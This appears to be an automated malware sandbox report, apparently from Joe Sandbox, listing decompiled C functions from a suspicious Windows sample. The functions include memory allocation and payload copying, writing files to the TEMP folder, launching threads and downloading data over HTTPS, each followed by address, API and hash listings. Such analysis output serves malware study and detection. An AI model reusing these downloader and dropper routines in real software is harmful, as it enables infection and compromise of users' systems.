                                                                                                                                                                                                                                                                          							_v628 = _t198;
                                                                                                                                                                                                                                                                          							if(_v628 != 0) {
                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                          									E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                          									_t350 = _t350 + 0xc;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          									E04002510(_v628, 0x400e290);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L38:
                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          					goto L39;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                                                                          				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          					_t217 = E04002070( *(_v8 + 0x18));
                                                                                                                                                                                                                                                                          					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                          					_v40 = _t217;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                          					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                          					if(_v48 != 0) {
                                                                                                                                                                                                                                                                          						if(E04006260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
                                                                                                                                                                                                                                                                          							_t248 = E04002070(_v48);
                                                                                                                                                                                                                                                                          							_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                          							_v40 = _t248;
                                                                                                                                                                                                                                                                          							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                          								E04007B70(_v36, _v48, _v44);
                                                                                                                                                                                                                                                                          								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree(_v48, 0, 0x8000);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if(_v40 == 0) {
                                                                                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                                                                                          					goto L38;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                          						E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                          						_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          						_t223 = E040097A0(0x10);
                                                                                                                                                                                                                                                                          						_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                          						_v632 = _t223;
                                                                                                                                                                                                                                                                          						_v52 = _v632;
                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
                                                                                                                                                                                                                                                                          							if( *_v52 != 0) {
                                                                                                                                                                                                                                                                          								E04007B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                          								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                          								 *(_v52 + 4) =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *_v52 = _v36;
                                                                                                                                                                                                                                                                          							 *(_v52 + 4) = _v44;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if( *_v52 != 0) {
                                                                                                                                                                                                                                                                          							 *(_v52 + 8) =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
                                                                                                                                                                                                                                                                          							_v56 = CreateThread(0, 0, E040077B0, _v52, 0, 0);
                                                                                                                                                                                                                                                                          							CloseHandle(_v56);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          						E04002510(_v40, 0x400e290);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}


































                                                                                                                                                                                                                                                                          0x04006dac
                                                                                                                                                                                                                                                                          0x04006db3
                                                                                                                                                                                                                                                                          0x0400723f
                                                                                                                                                                                                                                                                          0x04007244
                                                                                                                                                                                                                                                                          0x04007244
                                                                                                                                                                                                                                                                          0x04006dc9
                                                                                                                                                                                                                                                                          0x04006dd1
                                                                                                                                                                                                                                                                          0x04006ddc
                                                                                                                                                                                                                                                                          0x04006de5
                                                                                                                                                                                                                                                                          0x04006dee
                                                                                                                                                                                                                                                                          0x04006df7
                                                                                                                                                                                                                                                                          0x04006e00
                                                                                                                                                                                                                                                                          0x04006e09
                                                                                                                                                                                                                                                                          0x04006e15
                                                                                                                                                                                                                                                                          0x04007028
                                                                                                                                                                                                                                                                          0x04007039
                                                                                                                                                                                                                                                                          0x0400704a
                                                                                                                                                                                                                                                                          0x0400704f
                                                                                                                                                                                                                                                                          0x04007077
                                                                                                                                                                                                                                                                          0x04007099
                                                                                                                                                                                                                                                                          0x040070a6
                                                                                                                                                                                                                                                                          0x040070ac
                                                                                                                                                                                                                                                                          0x040070b6
                                                                                                                                                                                                                                                                          0x040070c6
                                                                                                                                                                                                                                                                          0x040070d5
                                                                                                                                                                                                                                                                          0x040071af
                                                                                                                                                                                                                                                                          0x040070db
                                                                                                                                                                                                                                                                          0x040070eb
                                                                                                                                                                                                                                                                          0x04007107
                                                                                                                                                                                                                                                                          0x04007114
                                                                                                                                                                                                                                                                          0x0400713d
                                                                                                                                                                                                                                                                          0x04007163
                                                                                                                                                                                                                                                                          0x0400716f
                                                                                                                                                                                                                                                                          0x0400716f
                                                                                                                                                                                                                                                                          0x04007183
                                                                                                                                                                                                                                                                          0x04007183
                                                                                                                                                                                                                                                                          0x04007189
                                                                                                                                                                                                                                                                          0x040071bc
                                                                                                                                                                                                                                                                          0x040071c9
                                                                                                                                                                                                                                                                          0x040071e0
                                                                                                                                                                                                                                                                          0x040071e5
                                                                                                                                                                                                                                                                          0x040071e8
                                                                                                                                                                                                                                                                          0x040071f5
                                                                                                                                                                                                                                                                          0x040071fe
                                                                                                                                                                                                                                                                          0x04007212
                                                                                                                                                                                                                                                                          0x04007217
                                                                                                                                                                                                                                                                          0x04007217
                                                                                                                                                                                                                                                                          0x04007223
                                                                                                                                                                                                                                                                          0x04007231
                                                                                                                                                                                                                                                                          0x04007236
                                                                                                                                                                                                                                                                          0x04007223
                                                                                                                                                                                                                                                                          0x040071f5
                                                                                                                                                                                                                                                                          0x040071c9
                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                          0x04006e1b
                                                                                                                                                                                                                                                                          0x04006e22
                                                                                                                                                                                                                                                                          0x04006e29
                                                                                                                                                                                                                                                                          0x04006e39
                                                                                                                                                                                                                                                                          0x04006eec
                                                                                                                                                                                                                                                                          0x04006ef1
                                                                                                                                                                                                                                                                          0x04006ef4
                                                                                                                                                                                                                                                                          0x04006e3f
                                                                                                                                                                                                                                                                          0x04006e4f
                                                                                                                                                                                                                                                                          0x04006e65
                                                                                                                                                                                                                                                                          0x04006e6c
                                                                                                                                                                                                                                                                          0x04006e8c
                                                                                                                                                                                                                                                                          0x04006e92
                                                                                                                                                                                                                                                                          0x04006e97
                                                                                                                                                                                                                                                                          0x04006e9a
                                                                                                                                                                                                                                                                          0x04006ea6
                                                                                                                                                                                                                                                                          0x04006ebb
                                                                                                                                                                                                                                                                          0x04006eca
                                                                                                                                                                                                                                                                          0x04006ecf
                                                                                                                                                                                                                                                                          0x04006ecf
                                                                                                                                                                                                                                                                          0x04006ea6
                                                                                                                                                                                                                                                                          0x04006edd
                                                                                                                                                                                                                                                                          0x04006edd
                                                                                                                                                                                                                                                                          0x04006ee3
                                                                                                                                                                                                                                                                          0x04006efb
                                                                                                                                                                                                                                                                          0x04007012
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006f01
                                                                                                                                                                                                                                                                          0x04006f08
                                                                                                                                                                                                                                                                          0x04006f1c
                                                                                                                                                                                                                                                                          0x04006f21
                                                                                                                                                                                                                                                                          0x04006f21
                                                                                                                                                                                                                                                                          0x04006f2d
                                                                                                                                                                                                                                                                          0x04006f35
                                                                                                                                                                                                                                                                          0x04006f3a
                                                                                                                                                                                                                                                                          0x04006f3d
                                                                                                                                                                                                                                                                          0x04006f49
                                                                                                                                                                                                                                                                          0x04006f55
                                                                                                                                                                                                                                                                          0x04006f83
                                                                                                                                                                                                                                                                          0x04006f8b
                                                                                                                                                                                                                                                                          0x04006fa1
                                                                                                                                                                                                                                                                          0x04006fa6
                                                                                                                                                                                                                                                                          0x04006fb2
                                                                                                                                                                                                                                                                          0x04006fb2
                                                                                                                                                                                                                                                                          0x04006f57
                                                                                                                                                                                                                                                                          0x04006f5d
                                                                                                                                                                                                                                                                          0x04006f65
                                                                                                                                                                                                                                                                          0x04006f65
                                                                                                                                                                                                                                                                          0x04006fbb
                                                                                                                                                                                                                                                                          0x04006fc6
                                                                                                                                                                                                                                                                          0x04006fcf
                                                                                                                                                                                                                                                                          0x04006fe9
                                                                                                                                                                                                                                                                          0x04006ff0
                                                                                                                                                                                                                                                                          0x04006ff0
                                                                                                                                                                                                                                                                          0x04006fbb
                                                                                                                                                                                                                                                                          0x04006fff
                                                                                                                                                                                                                                                                          0x0400700a
                                                                                                                                                                                                                                                                          0x0400700f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006fff

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 04006DC9
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04006DD1
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04006E5F
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 04006EB5
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 04006EDD
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04006F7A
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04006FE3
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04006FF0
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 04007028
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04007059
                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 04007077
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04007093
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007101
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0400715D
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04007183
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 040071A9
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 040071BC
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04007239
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                                          • String ID: TEMP
                                                                                                                                                                                                                                                                          • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                                          • Opcode ID: 39e740e402b3d58b52e9657545899331c46d826c986235e8a63d4a66dd2a8cdf
                                                                                                                                                                                                                                                                          • Instruction ID: 2b87ebad86062e1f9aa8347128cf2fe592da7145f1ccd4accac7794ca236a0a8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39e740e402b3d58b52e9657545899331c46d826c986235e8a63d4a66dd2a8cdf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF10975A00208EFEB58DF94D984F9DB7B5BB88304F248698E509BB390D775AE81CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04002900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				CHAR* _v28;
                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                          				void _v296;
                                                                                                                                                                                                                                                                          				void* _v300;
                                                                                                                                                                                                                                                                          				long _v304;
                                                                                                                                                                                                                                                                          				long _v308;
                                                                                                                                                                                                                                                                          				char* _t54;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                          					_t54 =  *0x400e004; // 0x400c398
                                                                                                                                                                                                                                                                          					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x400c3d2, 0x400c3d1, 3, 0, 0);
                                                                                                                                                                                                                                                                          						if(_v16 != 0) {
                                                                                                                                                                                                                                                                          							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                          								wsprintfA( &_v292, "https://%s", _a4);
                                                                                                                                                                                                                                                                          								_v28 = "Accept: */*";
                                                                                                                                                                                                                                                                          								_v24 = 4;
                                                                                                                                                                                                                                                                          								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
                                                                                                                                                                                                                                                                          								_v296 = _v296 | 0x0000b180;
                                                                                                                                                                                                                                                                          								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
                                                                                                                                                                                                                                                                          								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
                                                                                                                                                                                                                                                                          									_v308 = GetLastError();
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v300 = 0;
                                                                                                                                                                                                                                                                          									while(_v300 < _a12) {
                                                                                                                                                                                                                                                                          										_v304 = 0;
                                                                                                                                                                                                                                                                          										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
                                                                                                                                                                                                                                                                          										if(_v304 != 0) {
                                                                                                                                                                                                                                                                          											_v300 = _v300 + _v304;
                                                                                                                                                                                                                                                                          											 *(_a8 + _v300) = 0;
                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v8 = _v300;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								InternetCloseHandle(_v20);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v12);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                          0x04002909
                                                                                                                                                                                                                                                                          0x04002914
                                                                                                                                                                                                                                                                          0x04002936
                                                                                                                                                                                                                                                                          0x04002942
                                                                                                                                                                                                                                                                          0x04002949
                                                                                                                                                                                                                                                                          0x04002972
                                                                                                                                                                                                                                                                          0x04002979
                                                                                                                                                                                                                                                                          0x040029a3
                                                                                                                                                                                                                                                                          0x040029aa
                                                                                                                                                                                                                                                                          0x040029c0
                                                                                                                                                                                                                                                                          0x040029c9
                                                                                                                                                                                                                                                                          0x040029d0
                                                                                                                                                                                                                                                                          0x040029e8
                                                                                                                                                                                                                                                                          0x040029f9
                                                                                                                                                                                                                                                                          0x04002a0e
                                                                                                                                                                                                                                                                          0x04002a33
                                                                                                                                                                                                                                                                          0x04002ab5
                                                                                                                                                                                                                                                                          0x04002a35
                                                                                                                                                                                                                                                                          0x04002a35
                                                                                                                                                                                                                                                                          0x04002a3f
                                                                                                                                                                                                                                                                          0x04002a4a
                                                                                                                                                                                                                                                                          0x04002a73
                                                                                                                                                                                                                                                                          0x04002a80
                                                                                                                                                                                                                                                                          0x04002a90
                                                                                                                                                                                                                                                                          0x04002a9f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002a82
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002a80
                                                                                                                                                                                                                                                                          0x04002aaa
                                                                                                                                                                                                                                                                          0x04002aaa
                                                                                                                                                                                                                                                                          0x04002acb
                                                                                                                                                                                                                                                                          0x04002acb
                                                                                                                                                                                                                                                                          0x04002ad5
                                                                                                                                                                                                                                                                          0x04002ad5
                                                                                                                                                                                                                                                                          0x04002adf
                                                                                                                                                                                                                                                                          0x04002adf
                                                                                                                                                                                                                                                                          0x04002949
                                                                                                                                                                                                                                                                          0x04002aeb

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(0400C398,00000001,00000000,00000000,00000000), ref: 0400293C
                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,00000000,000001BB,0400C3D2,0400C3D1,00000003,00000000,00000000), ref: 0400296C
                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,GET,0400C3D8,1.1,00000000,00000000,80800000,00000000), ref: 0400299D
                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 040029C0
                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 040029E8
                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002A0E
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0400C3EC,00000000,00000000), ref: 04002A1C
                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,0400C3EC,00000000), ref: 04002A2B
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 04002A73
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04002AAF
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002ACB
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002AD5
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002ADF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                                                                                                          • String ID: 1.1$GET$https://%s
                                                                                                                                                                                                                                                                          • API String ID: 2082764430-1670984264
                                                                                                                                                                                                                                                                          • Opcode ID: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                          • Instruction ID: 6d54c3b05ff69590bd14da6a4fff8ed2da31e3bdf774b399ca20979b5291bdcc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cac5eb598011e3025bfd3ce525b4309c6a0d8895317d56ddd471764706ed79e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02510C71944218AFEB24CF94DC89BEEB7B4EB49700F108598F605B62C0C7B8AE94CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040035E0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v12;
                                                                                                                                                                                                                                                                          				char _v532;
                                                                                                                                                                                                                                                                          				void* _v536;
                                                                                                                                                                                                                                                                          				long _v540;
                                                                                                                                                                                                                                                                          				void* _v544;
                                                                                                                                                                                                                                                                          				long _v548;
                                                                                                                                                                                                                                                                          				CHAR* _v552;
                                                                                                                                                                                                                                                                          				void* _v556;
                                                                                                                                                                                                                                                                          				int _v560;
                                                                                                                                                                                                                                                                          				char _v820;
                                                                                                                                                                                                                                                                          				CHAR* _v824;
                                                                                                                                                                                                                                                                          				char _v1084;
                                                                                                                                                                                                                                                                          				signed char _v1085;
                                                                                                                                                                                                                                                                          				long _v1092;
                                                                                                                                                                                                                                                                          				intOrPtr _v1096;
                                                                                                                                                                                                                                                                          				long _t124;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				_v12 = GetModuleHandleA(_a4);
                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                          					E04002E50( &_v532,  &_v532, 0, 0x208);
                                                                                                                                                                                                                                                                          					if(GetModuleFileNameA(_v12,  &_v532, 0x207) > 0) {
                                                                                                                                                                                                                                                                          						_v536 = CreateFileA( &_v532, 0x80000000, 7, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                          						if(_v536 != 0xffffffff) {
                                                                                                                                                                                                                                                                          							_v540 = GetFileSize(_v536, 0);
                                                                                                                                                                                                                                                                          							if(_v540 > 0) {
                                                                                                                                                                                                                                                                          								_v544 = VirtualAlloc(0, _v540, 0x3000, 4);
                                                                                                                                                                                                                                                                          								_t155 = _v544;
                                                                                                                                                                                                                                                                          								if(_v544 != 0) {
                                                                                                                                                                                                                                                                          									_v548 = 0;
                                                                                                                                                                                                                                                                          									ReadFile(_v536, _v544, _v540,  &_v548, 0);
                                                                                                                                                                                                                                                                          									_v556 = E04003370(_v536, _t155, _v544, _v540);
                                                                                                                                                                                                                                                                          									_v552 = E04003580(_a8, _v556, _a8);
                                                                                                                                                                                                                                                                          									_v560 = lstrlenA(_v552);
                                                                                                                                                                                                                                                                          									if(_v560 > 2 && _v560 < 0x100) {
                                                                                                                                                                                                                                                                          										_v824 = _v552;
                                                                                                                                                                                                                                                                          										_v1085 = 0;
                                                                                                                                                                                                                                                                          										E04002E50(_v552,  &_v820, 0, 0x100);
                                                                                                                                                                                                                                                                          										E04002E50(_v552,  &_v1084, 0, 0x100);
                                                                                                                                                                                                                                                                          										_v1092 = 0;
                                                                                                                                                                                                                                                                          										while(_v1092 < _v560) {
                                                                                                                                                                                                                                                                          											if(_v824[_v1092] < 0x20 || _v824[_v1092] > 0x7e) {
                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                          												if(_v824[_v1092] != 0x2e) {
                                                                                                                                                                                                                                                                          													_t124 = _v1092 + 1;
                                                                                                                                                                                                                                                                          													__eflags = _t124;
                                                                                                                                                                                                                                                                          													_v1092 = _t124;
                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													lstrcpynA( &_v820, _v824, _v1092 + 1);
                                                                                                                                                                                                                                                                          													lstrcatA( &_v820, ".dll");
                                                                                                                                                                                                                                                                          													lstrcpyA( &_v1084,  &(_v824[_v1092 + 1]));
                                                                                                                                                                                                                                                                          													_v1085 = 1;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											break;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										if((_v1085 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          											_v8 = E040035E0( &_v820,  &_v1084);
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									if(_v8 == 0 && _v552 != 0) {
                                                                                                                                                                                                                                                                          										_v1096 = _v552 - _v556;
                                                                                                                                                                                                                                                                          										_v8 = _v12 + _v1096;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									VirtualFree(_v556, 0, 0x8000);
                                                                                                                                                                                                                                                                          									VirtualFree(_v544, 0, 0x8000);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							CloseHandle(_v536);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                          0x040035e9
                                                                                                                                                                                                                                                                          0x040035fa
                                                                                                                                                                                                                                                                          0x04003601
                                                                                                                                                                                                                                                                          0x04003615
                                                                                                                                                                                                                                                                          0x04003635
                                                                                                                                                                                                                                                                          0x04003657
                                                                                                                                                                                                                                                                          0x04003664
                                                                                                                                                                                                                                                                          0x04003679
                                                                                                                                                                                                                                                                          0x04003686
                                                                                                                                                                                                                                                                          0x040036a2
                                                                                                                                                                                                                                                                          0x040036a8
                                                                                                                                                                                                                                                                          0x040036af
                                                                                                                                                                                                                                                                          0x040036b5
                                                                                                                                                                                                                                                                          0x040036dd
                                                                                                                                                                                                                                                                          0x040036f9
                                                                                                                                                                                                                                                                          0x04003712
                                                                                                                                                                                                                                                                          0x04003725
                                                                                                                                                                                                                                                                          0x04003732
                                                                                                                                                                                                                                                                          0x0400374e
                                                                                                                                                                                                                                                                          0x04003754
                                                                                                                                                                                                                                                                          0x04003769
                                                                                                                                                                                                                                                                          0x0400377f
                                                                                                                                                                                                                                                                          0x04003787
                                                                                                                                                                                                                                                                          0x040037a2
                                                                                                                                                                                                                                                                          0x040037c6
                                                                                                                                                                                                                                                                          0x040037e0
                                                                                                                                                                                                                                                                          0x040037f2
                                                                                                                                                                                                                                                                          0x04003799
                                                                                                                                                                                                                                                                          0x04003799
                                                                                                                                                                                                                                                                          0x0400379c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040037f4
                                                                                                                                                                                                                                                                          0x0400380c
                                                                                                                                                                                                                                                                          0x0400381e
                                                                                                                                                                                                                                                                          0x0400383c
                                                                                                                                                                                                                                                                          0x04003842
                                                                                                                                                                                                                                                                          0x04003842
                                                                                                                                                                                                                                                                          0x040037f2
